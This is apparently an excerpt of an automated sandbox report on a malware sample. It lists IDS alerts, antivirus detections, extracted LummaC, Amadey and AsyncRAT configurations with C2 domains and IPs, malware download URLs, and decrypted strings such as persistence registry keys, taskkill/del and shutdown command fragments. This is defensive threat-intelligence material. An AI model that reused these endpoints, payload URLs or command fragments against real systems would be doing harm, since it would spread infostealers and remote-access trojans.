                                2025-02-11T09:20:48.008021+010028033053Unknown Traffic192.168.11.2049791185.215.113.7580TCP
                                2025-02-11T09:20:53.838335+010028033053Unknown Traffic192.168.11.2049798185.215.113.7580TCP
                                2025-02-11T09:21:00.613910+010028033053Unknown Traffic192.168.11.2049801185.215.113.7580TCP
                                2025-02-11T09:21:07.475442+010028033053Unknown Traffic192.168.11.2049804185.215.113.7580TCP
                                2025-02-11T09:21:09.203515+010028033053Unknown Traffic192.168.11.2049806185.215.113.7580TCP
                                2025-02-11T09:21:20.376790+010028033053Unknown Traffic192.168.11.2049813185.215.113.7580TCP
                                2025-02-11T09:21:26.596946+010028033053Unknown Traffic192.168.11.2049815185.215.113.7580TCP
                                2025-02-11T09:21:35.076701+010028033053Unknown Traffic192.168.11.2049819185.215.113.7580TCP
                                2025-02-11T09:21:41.764834+010028033053Unknown Traffic192.168.11.2049827185.215.113.7580TCP
                                2025-02-11T09:21:46.125492+010028033053Unknown Traffic192.168.11.2049830185.215.113.7580TCP
                                2025-02-11T09:21:52.733971+010028033053Unknown Traffic192.168.11.2049833185.215.113.7580TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:22:12.293126+010028299091Malware Command and Control Activity Detected192.168.11.204983741.216.188.19880TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:22:12.293126+010028197051Malware Command and Control Activity Detected192.168.11.204983741.216.188.19880TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:22:11.917406+010028302381A Network Trojan was detected192.168.11.204983741.216.188.19880TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:13.068455+010028586661Domain Observed Used for C2 Detected192.168.11.204980923.204.173.220443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: QkRFz2sau5.exeAvira: detected
                                Antivirus detection for URL or domain
                                Source: voicesharped.comAvira URL Cloud: Label: malware
                                Source: https://paleboreei.biz/Avira URL Cloud: Label: malware
                                Source: http://185.215.113.43/Zu7JuNko/index.phpQT4unAvira URL Cloud: Label: malware
                                Source: https://importenptoc.com/Avira URL Cloud: Label: malware
                                Source: http://185.215.113.43/Zu7JuNko/index.phpAvira URL Cloud: Label: malware
                                Source: https://rebeldettern.com/apit4Avira URL Cloud: Label: malware
                                Source: https://importenptoc.com/P1XAvira URL Cloud: Label: malware
                                Source: actiothreaz.comAvira URL Cloud: Label: malware
                                Source: breedertremnd.comAvira URL Cloud: Label: malware
                                Source: http://185.215.113.75/files/7244183739/L5shRfh.exeAvira URL Cloud: Label: phishing
                                Source: https://rebeldettern.com/apiAvira URL Cloud: Label: malware
                                Source: https://rebeldettern.com/apioAvira URL Cloud: Label: malware
                                Source: https://rebeldettern.com/apitAvira URL Cloud: Label: malware
                                Source: https://rebeldettern.com/apivAvira URL Cloud: Label: malware
                                Source: https://cozyhomevpibes.cyou/Avira URL Cloud: Label: malware
                                Source: https://rebeldettern.com/apieAvira URL Cloud: Label: malware
                                Source: https://rebeldettern.com/apiRAvira URL Cloud: Label: malware
                                Source: https://paleboreei.biz/cAvira URL Cloud: Label: malware
                                Source: importenptoc.comAvira URL Cloud: Label: malware
                                Source: http://185.215.113.43/Zu7JuNko/index.phpWAvira URL Cloud: Label: malware
                                Source: https://paleboreei.biz/apis?:Avira URL Cloud: Label: malware
                                Source: inputrreparnt.comAvira URL Cloud: Label: malware
                                Source: https://paleboreei.biz/apiAvira URL Cloud: Label: malware
                                Source: https://rebeldettern.com/pAvira URL Cloud: Label: malware
                                Source: https://rebeldettern.com/kAvira URL Cloud: Label: malware
                                Source: http://185.215.113.16/mine/random.exeAvira URL Cloud: Label: malware
                                Source: https://importenptoc.com/YAvira URL Cloud: Label: malware
                                Source: http://185.215.113.43/Zu7JuNko/index.phpEAvira URL Cloud: Label: malware
                                Source: http://185.215.113.43/Zu7JuNko/index.phpIAvira URL Cloud: Label: malware
                                Source: https://importenptoc.com/PAvira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                Found malware configuration
                                Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["cozyhomevpibes.cyou", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "FATE99--test"}
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackMalware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeReversingLabs: Detection: 79%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exeReversingLabs: Detection: 63%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[2].exeReversingLabs: Detection: 87%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[2].exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[2].exeReversingLabs: Detection: 87%
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEReversingLabs: Detection: 47%
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeReversingLabs: Detection: 63%
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeReversingLabs: Detection: 79%
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeReversingLabs: Detection: 87%
                                Source: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exeReversingLabs: Detection: 87%
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 47%
                                Multi AV Scanner detection for submitted file
                                Source: QkRFz2sau5.exeVirustotal: Detection: 54%Perma Link
                                Source: QkRFz2sau5.exeReversingLabs: Detection: 50%
                                Joe Sandbox ML detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJoe Sandbox ML: detected
                                Machine Learning detection for sample
                                Source: QkRFz2sau5.exeJoe Sandbox ML: detected
                                Sample uses string decryption to hide its real strings
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpString decryptor: 7707
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpString decryptor: 159.100.19.137
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpString decryptor: 0.5.8
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpString decryptor: false
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpString decryptor: yBu0GW2G5zAc
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpString decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpString decryptor: GP97vNLr0Wa9AfljI/phz7VBswKUASqgiIZZNodWNIPzI+56yXWuOpvWNTQgDoUgAOskV2wmjD76A2aVNhUQyD92KSnqDXlLV+P47rGl14aHUzYeuCKUXHJvFlkQk8GfPZNKaXZNiDGmKibSepgjoJIIM3/Vc+3s07D2Dmv8Bo2hYGsNeAEVOq3oF0fCL5kPxaUCQE+9cR0dxZoIfy5DlW14E6ZSTfnUegUZ8g8ADtxIu5h+2fL58CwzpUlLdw8kRHvK2JPYQSAXV3IiMTw58KlB34+Nw51yoc05UAGmWcMJPRuU2+p/l1cNkzDepbf1evSE6bARyi/iao6lMUMD6paEM4DxEFckeqpVjs3BIx6A1EcYTcx8NepXiEhp/eqoqoCjHS/jwuMPB8KLFpBK7upxBrI6YtoB+sFqHq9bo62za97eZbIE5lxlsp88UEhUa6rAgiH9QNyqb+pfOX7MpaYBYpFDqizolVMqtQC20H8E6szaut4gjCIOUqUHhBSgFtWjJGR1F6x4RUn8llIW1Bvn6uRNFur5U9N5XYZxRThgmv05Cr+Qb09v+D95XyOJqvUSTWKXzmr1tMNRcNEyT3g74VybkYdRldrU1n3+MmLM7RsivXydzIm4+qzkyH58CXkq8767vS6MX3HvkK+WsPnITsc0iub7sUPhNwTofv8=
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpString decryptor: null
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpString decryptor: Default
                                Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmpString decryptor: cozyhomevpibes.cyou
                                Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmpString decryptor: importenptoc.com
                                Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmpString decryptor: voicesharped.com
                                Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmpString decryptor: inputrreparnt.com
                                Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmpString decryptor: torpdidebar.com
                                Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmpString decryptor: rebeldettern.com
                                Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmpString decryptor: actiothreaz.com
                                Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmpString decryptor: garulouscuto.com
                                Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmpString decryptor: breedertremnd.com
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: 185.215.113.43
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: /Zu7JuNko/index.php
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: S-%lu-
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: abc3bc1985
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: skotes.exe
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Startup
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: cmd /C RMDIR /s/q
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: rundll32
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Programs
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: %USERPROFILE%
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: cred.dll|clip.dll|
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: cred.dll
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: clip.dll
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: http://
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: https://
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: /quiet
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: /Plugins/
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: &unit=
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: shell32.dll
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: kernel32.dll
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: GetNativeSystemInfo
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: ProgramData\
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: AVAST Software
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Kaspersky Lab
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Panda Security
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Doctor Web
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: 360TotalSecurity
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Bitdefender
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Norton
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Sophos
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Comodo
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: WinDefender
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: 0123456789
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: ------
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: ?scr=1
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: ComputerName
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: -unicode-
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: VideoID
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: DefaultSettings.XResolution
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: DefaultSettings.YResolution
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: ProductName
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: CurrentBuild
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: rundll32.exe
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: "taskkill /f /im "
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: " && timeout 1 && del
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: && Exit"
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: " && ren
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: Powershell.exe
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: -executionpolicy remotesigned -File "
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: shutdown -s -t 0
                                Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmpString decryptor: random
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: 7707
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: 159.100.19.137
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: 0.5.8
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: false
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: yBu0GW2G5zAc
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
